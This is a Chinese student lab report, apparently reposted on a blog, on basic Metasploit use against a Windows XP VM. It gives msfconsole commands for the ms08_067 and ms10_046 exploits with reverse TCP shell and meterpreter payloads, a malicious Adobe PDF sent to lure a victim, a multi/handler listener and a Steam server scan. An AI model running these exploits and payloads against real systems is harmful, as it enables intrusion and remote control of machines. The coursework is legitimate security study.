20155211 Exp5 MSF基礎應用
阿新 • • 發佈:2018-05-04
服務 地方 .com ner HA window ip地址 IT sfc
20155211 Exp5 MSF基礎應用
基礎問題回答
- 用自己的話解釋什麽是exploit,payload,encode?
exploit:漏洞攻擊。一個exploit程序肯定會觸發系統的一個或多個漏洞,進而程序直接獲取到目標系統的部分或所有權限。一個漏洞攻擊程序可以在本地運行也可以遠程運行,遠程運行的漏洞攻擊可以理論上獲取被攻擊系統的所有控制權。
payload:有效載荷,可以理解為搞破壞的關鍵代碼。電腦病毒中可以直接完成預定目標的代碼段便是其“有效載荷”。
encode:編碼。通過一些特殊手段的編碼,可以既保證有效載荷不被破壞,又使得漏洞攻擊程序不會被偵察到。
實踐內容
因為個人電腦設備的原因,借用同組同學20155223蘇黃永酈同學的電腦完成本次實驗
主動攻擊:ms08_067漏洞攻擊
- 攻擊方:Kali Linux x64
- 靶機:Windows XP SP3
- 關閉XP的所有防禦,包括防火墻和殺毒軟件。
在Kali機啟動msfconsole,按照指導步驟輸入以下代碼:
use exploit/windows/smb/ms08_067_netapi // 使用ms08_067漏洞攻擊方式 set payload generic/shell_reverse_tcp // 以shell反向tcp連接為有效載荷 set RHOST 192.168.129.134 // 受害者的IP set LHOST 192.168.129.133 // 施害者的IP set target 0 // 設置目標,0為無差別攻擊
輸入exploit開始發動攻擊:
對瀏覽器攻擊:ms10_046漏洞攻擊
- 受害者:Windows XP SP3(zh_cn)
- 攻擊者:Kali Linux
在Kali攻擊機開啟msfconsole,輸入以下命令:
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader // 使用瀏覽器漏洞 set payload windows/meterpreter/reverse_tcp // 選擇反向鏈接載荷
關於本次攻擊的設置:
set SRVHOST 192.168.129.133 // 設置服務器主機IP set LHOST 192.168.129.133 // 設置攻擊機IP
- 之後輸入exploit會出現一段URI:http://192.168.129.133:80/,同時控制臺進入監聽狀態。
xp訪問這個URI,會彈出一個這樣的窗口:
同時,一直在監聽的控制臺同受害者建立起一個連接:
- 輸入sessions查看有多少機器被反向鏈接到Kali機上(只有一個)。
再次輸入sessions -i 1以控制受害者。
對Adobe的漏洞攻擊
- 輸入exploit/windows/fileformat/adobe_cooltype_sing確定攻擊方案。
設置很簡單,只需要確定攻擊機的IP地址就可以了,端口是學號5211。
- 把生成的文件發送到受害者,並誘使其打開這個來路不明的pdf文件。
同時,在Kali的msfconsole上輸入以下命令開始監聽:
use exploit/multi/handler set LHOST 192.168.129.133 set LPORT 5211 exploit
輔助模塊的應用
use scanner/steam/server_info,show options
這掃描模塊只用設置掃描起點IP即可,掃描範圍默認為10(從起始地址開始往後掃10個)。端口固定為UDP端口27015,端口27015只是用作輸入/輸出的通信端口
。- 設置起點為192.168.129.135。如果在這個範圍內真的有服務器,我就想知道是哪個人會在這麽長的地方設置服務器。
- 然後是沒有,emmmm並不意外。
實驗總結與體會
感覺msf是個神奇的東西。。。雖然我們學的都是最簡單的,但是每次實驗做完都有種細思極恐的感覺。。這次尤為嚴重。。雖然知道自己不會被這麽對待。。但是想到別人會這樣對待你還是慢慫的。
20155211 Exp5 MSF基礎應用